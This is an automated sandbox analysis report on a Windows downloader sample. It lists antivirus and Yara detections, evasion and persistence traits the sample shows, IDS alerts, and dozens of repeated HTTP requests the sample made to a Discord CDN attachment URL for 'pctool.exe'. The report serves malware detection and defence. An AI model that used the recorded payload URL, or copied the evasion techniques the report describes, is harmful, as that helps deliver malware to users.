Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Sample1.exe

Overview

General Information

Sample name:Sample1.exe
Analysis ID:1591875
MD5:45a47d815f2291bc7fc0112d36aaad83
SHA1:db1dc02b2d64c4c3db89b5df3124dd87d43059d5
SHA256:416e63fb614101d5644592d5f589f358f8d5a41dd6812a717cbf05470864ac6f
Infos:

Detection

Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Machine Learning detection for sample
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Yara signature match

Classification

Process Tree

  • System is w11x64_office
  • Sample1.exe (PID: 8064 cmdline: "C:\Users\user\Desktop\Sample1.exe" MD5: 45A47D815F2291BC7FC0112D36AAAD83)
  • SystemSettingsBroker.exe (PID: 1800 cmdline: C:\Windows\System32\SystemSettingsBroker.exe -Embedding MD5: 899E65893CDEE7F9022DC9B583F94F0F)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
Sample1.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
    Sample1.exeMALWARE_Win_DLInjector04Detects downloader / injectorditekSHen
    • 0xbc2:$s1: Runner
    • 0xc54:$s2: DownloadPayload
    • 0xc64:$s3: RunOnStartup
    • 0xbd6:$a1: Antis
    • 0xc03:$a2: antiVM
    • 0xc0a:$a3: antiSandbox
    • 0xc16:$a4: antiDebug
    • 0xc20:$a5: antiEmulator
    • 0xc2d:$a6: enablePersistence
    • 0xc3f:$a7: enableFakeError
    • 0xc7f:$a8: DetectVirtualMachine
    • 0xca4:$a9: DetectSandboxie
    • 0xccf:$a10: DetectDebugger
    • 0xcde:$a11: CheckEmulator

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    Process Memory Space: Sample1.exe PID: 8064JoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
      Process Memory Space: Sample1.exe PID: 8064JoeSecurity_GenericDownloader_4Yara detected Generic DownloaderJoe Security

        Sigma Signatures

        No Sigma rule has matched

        Suricata Signatures

        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-01-15T15:18:56.208229+010028033053Unknown Traffic192.168.2.2549725162.159.134.233443TCP
        2025-01-15T15:19:01.854714+010028033053Unknown Traffic192.168.2.2549726162.159.134.233443TCP
        2025-01-15T15:19:07.485230+010028033053Unknown Traffic192.168.2.2549728162.159.134.233443TCP
        2025-01-15T15:19:13.110015+010028033053Unknown Traffic192.168.2.2549729162.159.134.233443TCP
        2025-01-15T15:19:18.847202+010028033053Unknown Traffic192.168.2.2549733162.159.134.233443TCP
        2025-01-15T15:19:24.464986+010028033053Unknown Traffic192.168.2.2549734162.159.134.233443TCP
        2025-01-15T15:19:30.235710+010028033053Unknown Traffic192.168.2.2549735162.159.134.233443TCP
        2025-01-15T15:19:35.857290+010028033053Unknown Traffic192.168.2.2549736162.159.134.233443TCP
        2025-01-15T15:19:41.496340+010028033053Unknown Traffic192.168.2.2549738162.159.134.233443TCP
        2025-01-15T15:19:47.151638+010028033053Unknown Traffic192.168.2.2549739162.159.134.233443TCP
        2025-01-15T15:19:52.784463+010028033053Unknown Traffic192.168.2.2549740162.159.134.233443TCP
        2025-01-15T15:19:58.602679+010028033053Unknown Traffic192.168.2.2549741162.159.134.233443TCP
        2025-01-15T15:20:04.267335+010028033053Unknown Traffic192.168.2.2549742162.159.134.233443TCP
        2025-01-15T15:20:09.899303+010028033053Unknown Traffic192.168.2.2549743162.159.134.233443TCP
        2025-01-15T15:20:15.597093+010028033053Unknown Traffic192.168.2.2549744162.159.134.233443TCP
        2025-01-15T15:20:21.219129+010028033053Unknown Traffic192.168.2.2549745162.159.134.233443TCP
        2025-01-15T15:20:26.894034+010028033053Unknown Traffic192.168.2.2549746162.159.134.233443TCP
        2025-01-15T15:20:32.497357+010028033053Unknown Traffic192.168.2.2549747162.159.134.233443TCP
        2025-01-15T15:20:38.233099+010028033053Unknown Traffic192.168.2.2549748162.159.134.233443TCP
        2025-01-15T15:20:43.861268+010028033053Unknown Traffic192.168.2.2549749162.159.134.233443TCP
        2025-01-15T15:20:49.470785+010028033053Unknown Traffic192.168.2.2549750162.159.134.233443TCP
        2025-01-15T15:20:55.238474+010028033053Unknown Traffic192.168.2.2549751162.159.134.233443TCP
        2025-01-15T15:21:00.915491+010028033053Unknown Traffic192.168.2.2549755162.159.134.233443TCP
        2025-01-15T15:21:06.530355+010028033053Unknown Traffic192.168.2.2549757162.159.134.233443TCP
        2025-01-15T15:21:12.188694+010028033053Unknown Traffic192.168.2.2549760162.159.134.233443TCP
        2025-01-15T15:21:17.839514+010028033053Unknown Traffic192.168.2.2549761162.159.134.233443TCP
        2025-01-15T15:21:23.438596+010028033053Unknown Traffic192.168.2.2549762162.159.134.233443TCP
        2025-01-15T15:21:29.086049+010028033053Unknown Traffic192.168.2.2549765162.159.134.233443TCP
        2025-01-15T15:21:34.705037+010028033053Unknown Traffic192.168.2.2549766162.159.134.233443TCP
        2025-01-15T15:21:40.342449+010028033053Unknown Traffic192.168.2.2549767162.159.134.233443TCP
        2025-01-15T15:21:46.012112+010028033053Unknown Traffic192.168.2.2549768162.159.134.233443TCP
        2025-01-15T15:21:51.634893+010028033053Unknown Traffic192.168.2.2549773162.159.134.233443TCP

        Joe Sandbox Signatures

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Antivirus / Scanner detection for submitted sample
        Source: Sample1.exeAvira: detected
        Multi AV Scanner detection for submitted file
        Source: Sample1.exeVirustotal: Detection: 83%Perma Link
        Source: Sample1.exeReversingLabs: Detection: 81%
        AI detected suspicious sample
        Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
        Machine Learning detection for sample
        Source: Sample1.exeJoe Sandbox ML: detected
        Source: Sample1.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
        Source: unknownHTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.25:49724 version: TLS 1.2
        Source: Sample1.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

        Networking

        barindex
        Yara detected Generic Downloader
        Source: Yara matchFile source: Process Memory Space: Sample1.exe PID: 8064, type: MEMORYSTR
        Source: Yara matchFile source: Sample1.exe, type: SAMPLE
        Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.com
        Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.com
        Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.com
        Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.com
        Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.com
        Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.com
        Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.com
        Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.com
        Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.com
        Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.com
        Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.com
        Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.com
        Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.com
        Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.com
        Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.com
        Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.com
        Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.com
        Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.com
        Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.com
        Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.com
        Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.com
        Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.com
        Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.com
        Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.com
        Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.com
        Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.com
        Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.com
        Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.com
        Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.com
        Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.com
        Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.com
        Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.com
        Source: Joe Sandbox ViewIP Address: 162.159.134.233 162.159.134.233
        Source: Joe Sandbox ViewIP Address: 162.159.134.233 162.159.134.233
        Source: Joe Sandbox ViewJA3 fingerprint: 6a5d235ee78c6aede6a61448b4e9ff1e
        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.25:49741 -> 162.159.134.233:443
        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.25:49762 -> 162.159.134.233:443
        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.25:49735 -> 162.159.134.233:443
        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.25:49750 -> 162.159.134.233:443
        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.25:49751 -> 162.159.134.233:443
        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.25:49766 -> 162.159.134.233:443
        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.25:49729 -> 162.159.134.233:443
        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.25:49738 -> 162.159.134.233:443
        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.25:49743 -> 162.159.134.233:443
        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.25:49745 -> 162.159.134.233:443
        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.25:49736 -> 162.159.134.233:443
        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.25:49749 -> 162.159.134.233:443
        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.25:49734 -> 162.159.134.233:443
        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.25:49728 -> 162.159.134.233:443
        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.25:49725 -> 162.159.134.233:443
        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.25:49726 -> 162.159.134.233:443
        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.25:49757 -> 162.159.134.233:443
        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.25:49742 -> 162.159.134.233:443
        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.25:49767 -> 162.159.134.233:443
        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.25:49740 -> 162.159.134.233:443
        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.25:49746 -> 162.159.134.233:443
        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.25:49739 -> 162.159.134.233:443
        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.25:49761 -> 162.159.134.233:443
        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.25:49760 -> 162.159.134.233:443
        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.25:49733 -> 162.159.134.233:443
        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.25:49744 -> 162.159.134.233:443
        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.25:49768 -> 162.159.134.233:443
        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.25:49747 -> 162.159.134.233:443
        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.25:49773 -> 162.159.134.233:443
        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.25:49748 -> 162.159.134.233:443
        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.25:49765 -> 162.159.134.233:443
        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.25:49755 -> 162.159.134.233:443
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.com
        Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.com
        Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.com
        Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.com
        Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.com
        Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.com
        Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.com
        Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.com
        Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.com
        Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.com
        Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.com
        Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.com
        Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.com
        Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.com
        Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.com
        Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.com
        Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.com
        Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.com
        Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.com
        Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.com
        Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.com
        Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.com
        Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.com
        Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.com
        Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.com
        Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.com
        Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.com
        Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.com
        Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.com
        Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.com
        Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.com
        Source: global trafficHTTP traffic detected: GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1Host: cdn.discordapp.com
        Source: global trafficDNS traffic detected: DNS query: cdn.discordapp.com
        Source: global trafficDNS traffic detected: DNS query: assets.msn.com
        Source: global trafficDNS traffic detected: DNS query: browser.events.data.msn.cn
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Jan 2025 14:18:50 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeSet-Cookie: __cf_bm=X7ypTZTEe3FS6ntDcrLVkieFIGLyMnWqCWZbbyNseHE-1736950730-1.0.1.1-likCCWH0Q3yYZ6FO1WQd1bbYEd4g5Y1gK7QgTl5BNgWEF1Hf9EZgevojPYP8qoum1CfC6LCAACww6gAuPaOygg; path=/; expires=Wed, 15-Jan-25 14:48:50 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Es%2FdW%2FY14VFucDKBS72G8XCQ6MjEsgU%2B9gRwWVjvoVstzjj4zCAKiPTuok0W7XcanjENsHojotNuwDiYQyONyM6TAub21ZCkl92Bm4SmOwgjtCN9H31rKuE2hPrMpRd0Yvvm0Q%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: _cfuvid=GLR.n09ePR8wKJpZKQOcpwthnOqAoRzDPG27pjOMP5M-1736950730258-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 90267f4fdd3d41e7-EWRalt-svc: h3=":443"; ma=86400
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Jan 2025 14:18:56 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeSet-Cookie: __cf_bm=sPZ._gvZuiMsNC1n96Ew5M8C1UyphFYGF.7LtT3BzbQ-1736950736-1.0.1.1-9s7iaqaXP0mJn8UO0Tc5xnADY7mfwfn8HAIp31aF2QOpBezGeXHRvvU7wWZQjF652R075AM5d9iZjnolT1ftng; path=/; expires=Wed, 15-Jan-25 14:48:56 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Z1kp3rZeL76F6b4n9wjFiAeE1XDTJXRDqI78XT20UV%2BOodmhJF%2Bg4cb%2FHqdLN5XIWgIflP44RMLOGIJBgNFkvlMQ5WQtj%2B8K0Y05bLtNhvYjUbGX2nCRLbS19XPf93VxHEiOdw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: _cfuvid=SQe4d2dytBuhz3b7tvK8tGYIrzXfAv6vBzbIWTzU2HQ-1736950736123-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 90267f74ad5a41d3-EWRalt-svc: h3=":443"; ma=86400
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Jan 2025 14:19:01 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeSet-Cookie: __cf_bm=vjKnbeyi0TI4kfIxj6mjPCAbJrqRMkAIJ_xSJEapyos-1736950741-1.0.1.1-bstkEOAXd52awHCodGlKdwmjNpF23s3tAvxhzveMTZaAkUvUCMtuY7czgcABYDiHqXqD1iJuOss56FVuvx771A; path=/; expires=Wed, 15-Jan-25 14:49:01 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lnca4oAFgsjacK0sn5i5m91LAv9Z8lOWc%2BWSiQEqg6BauUcsSSJm1JcCGiSrmx4AwGRYET7RRNc0JR0OjEgTK6EJYoZQr73rofRCcBrs713za0TcdE%2FtVMiJMrMc12kp4mHoTw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: _cfuvid=5tm_VWzg3O0_T7.Qm_PSiBVUTsYz44y81LD73x1DT24-1736950741785-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 90267f981e56f799-EWRalt-svc: h3=":443"; ma=86400
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Jan 2025 14:19:07 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeSet-Cookie: __cf_bm=tZGLutk0LFGV2qTE_YtsK1Ahp3kQ8T1ERueJsI.J1LQ-1736950747-1.0.1.1-Ke1mlI3InrdrQndQh6YXpmE9.x9gwgI.6XtAyJg760Iw81oTRbSo_lWJ6dQkeo3AcNeqz1ycVyQXc8bV_ka4Mw; path=/; expires=Wed, 15-Jan-25 14:49:07 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GPSob8UWbMprOoalMDEZ2Ahtm3r8FGl9aDBLs%2BYQX0c6ixZJXc%2BY3GhGSsCtQgh99Ze6MwGmDoOQUrK4SwzJwEh2Q0mCDTh%2FueGe6lF9pXU2g7zBgpodyTVaJjk8yNn4T5Ekcw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: _cfuvid=Z9lzIZQM040oveucDtfeTrlMJfknbSPBUtCO5OdGjgI-1736950747441-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 90267fbb5977c33c-EWRalt-svc: h3=":443"; ma=86400
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Jan 2025 14:19:13 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeSet-Cookie: __cf_bm=2m1rSsOEp2Ha_S74ELCRn3VC8gVJnZ0Fdgmfkf7FBc4-1736950753-1.0.1.1-xG9gBGNxNGZmgAohlUov77NM3.QnhZDttAtyFJCFgqdYcp9Zd5d_vhWK3pf9ACJm1U8t4tjNN6iFjkr7RVXbWQ; path=/; expires=Wed, 15-Jan-25 14:49:13 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=89dYNmdGL7ZmiCilgBnIugJb8SKyhsV7KNpMyWw2vWK9P%2BDo1%2BScBmFkrZntjl6Kd8DiM%2BKIvce3Su05gdnd8TdvrkjQPNlxRSJQ9QPC8S1DIjdrIYAvq8zhg11K6t1fifDGfA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: _cfuvid=3Bchd1uF6715knDbZx82swkgk.h2L.O6b8.4V.w9gXI-1736950753065-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 90267fde88810f67-EWRalt-svc: h3=":443"; ma=86400
